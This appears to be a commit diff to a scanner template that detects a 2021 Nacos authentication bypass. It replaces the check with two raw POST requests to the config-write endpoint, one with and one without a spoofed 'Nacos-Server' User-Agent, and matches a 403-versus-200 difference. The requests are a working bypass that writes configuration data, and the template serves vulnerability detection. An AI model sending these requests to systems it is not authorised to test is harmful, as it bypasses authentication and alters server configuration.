template update
parent
d2ea9d2da0
commit
22f123ff79
|
@ -16,21 +16,34 @@ info:
|
|||
tags: nacos,auth-bypass,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/nacos/v1/cs/configs?dataId=nacos.example&group=com.alibaba.nacos&content=helloWorld"
|
||||
headers:
|
||||
User-Agent: "Nacos-Server"
|
||||
- raw:
|
||||
- |
|
||||
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
|
||||
- |
|
||||
POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
User-Agent: Nacos-Server
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1 == 403"
|
||||
- "status_code_2 == 200"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(body_1, 'Forbidden')"
|
||||
- "contains(body_2, 'true')"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "body == 'true'"
|
||||
part: body
|
||||
|
|
Loading…
Reference in New Issue